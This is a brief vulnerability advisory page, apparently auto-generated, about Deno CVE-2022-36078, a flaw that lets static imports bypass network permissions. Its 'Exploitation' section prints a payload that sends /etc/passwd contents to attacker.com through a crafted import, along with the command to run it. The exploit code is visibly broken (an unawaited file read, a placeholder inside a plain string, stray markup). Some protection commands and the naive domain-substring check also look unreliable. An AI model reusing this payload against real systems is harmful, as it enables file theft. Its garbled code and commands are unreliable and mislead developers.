Listen to this Post
How the CVE Works
CVE-2022-36078 exploits Deno’s failure to enforce network permission checks on static imports. Attackers leverage this flaw to exfiltrate sensitive files (e.g., /etc/passwd) via crafted imports. When a Deno script with `–allow-read` and `–allow-write` executes, malicious code injects a static import pointing to an attacker-controlled domain. The import triggers an HTTP request containing stolen data, bypassing `–allow-net` restrictions. The attack requires two executions: first to modify the script with the malicious import, and second to exfiltrate data.
DailyCVE Form
Platform: Deno
Version: <1.25.2
Vulnerability: Import Bypass
Severity: Critical
Date: 2022-08-18
Prediction: Patched by 2022-08-25
What Undercode Say:
Exploitation
1. Payload Injection:
const payload = <code>import "https://attacker.com/steal?data=${encodeURIComponent(Deno.readTextFile("/etc/passwd"))}"</code>;
await Deno.writeTextFile("malicious.js", payload);
2. Trigger Exfiltration:
deno run --allow-read --allow-write malicious.js
Protection
1. Update Deno:
deno upgrade --version 1.25.2
2. Restrict Permissions:
deno run --no-allow-import vulnerable.js
3. Static Analysis:
grep -r "import.http" /path/to/code
Detection
1. Network Monitoring:
tcpdump -i eth0 'host attacker.com'
2. Deno Audit:
deno audit
Mitigation Code
// Validate imports before execution
const ALLOWED_DOMAINS = ["trusted.com"];
const file = await Deno.readTextFile("script.ts");
if (file.includes("import") && !ALLOWED_DOMAINS.some(d => file.includes(d))) {
throw new Error("Malicious import detected");
}
References
- Deno Security Advisory
- CVE-2022-36078
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
